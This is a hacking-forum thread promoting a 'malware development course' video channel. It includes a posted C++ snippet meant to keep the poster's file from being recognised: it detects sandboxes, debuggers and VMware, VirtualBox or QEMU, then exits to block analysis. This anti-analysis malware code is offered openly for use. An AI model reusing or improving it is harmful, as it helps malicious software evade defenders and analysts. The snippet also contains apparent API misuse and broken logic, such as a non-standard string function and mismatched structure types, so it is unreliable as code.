Unlock the Secrets of Malware Development: Comprehensive Course

Hi my fellow members am proud to tell that the promised malware development course is out now,
its 5 hours straight and it begins with the basics to advanced staff and this is part 1
it’s the biggest malware development on the internet
The link to the channel

Admins, IT personnel, malware developers, hackers please am kindly requesting for your support, i need to reach 1000 subscribers but i cant do it without you guys, am doing everything and have done everything because of your support so please support me by going to my channel and subscribe
BECAUSE WE ARE A COMMUNITY OF SUPPORTIVE INDIVIDUALS SO PLEASE SUPPORT YOUR OWN.
Hackers its your time to support me

Subscribe, share and like just that
Subscribe please to make the channel grow

3 Likes

Very nice! Thank you so much for sharing.

1 Like

welcome my friend and am dropping more

1 Like

If you can get people to watch your videos at a faster speed then you get double the views… im explaining wrong but look it up please ill try it watching it at a faster speed

1 Like

okay bro let mi try it out thanks alot

1 Like

I hope it worked and im watching your videos at a higher speed so i hope it gets your more views

1 Like

thanks my friend so apart from dat what else should improve

This is a sample code that I wrote to increase the rate of non-recognition of my file

# © Code By E1.Coders
#include <windows.h>
#include <winreg.h>
#include <stdio.h>

bool is_sandboxed() {
    HDEVINFO hDeviceInfo = SetupDiGetClassDevs(&GUID_DEVCLASS_DISKDRIVE, NULL, NULL, DIGCF_PRESENT | DIGCF_DEVICEINTERFACE);
    if (hDeviceInfo == INVALID_HANDLE_VALUE) {
        return false;
    }

SP_DEVICE_INTERFACE_DATA deviceInterfaceData;
    deviceInterfaceData.cbSize = sizeof(SP_DEVICE_INTERFACE_DATA);

for (int i = 0; SetupDiEnumDeviceInterfaces(hDeviceInfo, NULL, &GUID_DEVCLASS_DISKDRIVE, i, &deviceInterfaceData); i++) {
        DWORD dwRegKeySize = 0;
        SetupDiGetDeviceRegistryProperty(hDeviceInfo, &deviceInterfaceData, SPDRP_REGISTRYKEY, NULL, NULL, 0, &dwRegKeySize);

if (dwRegKeySize > 0) {
            wchar_t* pDeviceRegistryKey = (wchar_t*)malloc(dwRegKeySize);
            SetupDiGetDeviceRegistryProperty(hDeviceInfo, &deviceInterfaceData, SPDRP_REGISTRYKEY, NULL, (PBYTE)pDeviceRegistryKey, dwRegKeySize, NULL);

HKEY hKey;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, pDeviceRegistryKey, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
                wchar_t path[MAX_PATH];
                if (RegQueryValueExW(hKey, L"Parent", NULL, NULL, (LPBYTE)path, NULL) == ERROR_SUCCESS) {
                    if (_wcsstr(path, L"VMWare") || _wcsstr(path, L"VirtualBox")) {
                        free(pDeviceRegistryKey);
                        RegCloseKey(hKey);
                        SetupDiDestroyDeviceInfoList(hDeviceInfo);
                        return true;
                    }
                }

RegCloseKey(hKey);
            }

free(pDeviceRegistryKey);
        }
    }

SetupDiDestroyDeviceInfoList(hDeviceInfo);
    return false;
}

bool is_debugger_present() {
    return IsDebuggerPresent();
}

bool is_virtualized() {
    bool is_virtualized = false;

// Check for virtualized CPUID function
    __try {
        __asm {
            mov eax, 0x80000001
            cpuid
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        is_virtualized = true;
    }

// Check for hypervisor-specific indicators
    HKEY hKey;
    if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        wchar_t vendor[0x40];
        DWORD size = sizeof(vendor);
        RegQueryValueExW(hKey, L"VendorIdentifier", NULL, NULL, (LPBYTE)vendor, &size);

if (_wcsstr(vendor, L"VMware") || _wcsstr(vendor, L"VirtualBox") || _wcsstr(vendor, L"QEMU")) {
            is_virtualized = true;
        }

RegCloseKey(hKey);
    }

return is_virtualized;
}

int main() {
    if (is_sandboxed() || is_debugger_present() || is_virtualized()) {
        // Prevent analysis by exiting
        exit(0);
    }

// Rest of the code
    return 0;
}

Hi guys I am a new one here, and I am really interested in learning hacking, is there anyone willing to teach me this cool skill? I know how to program C++ (not super advanced though), and i do understand the basics of binary.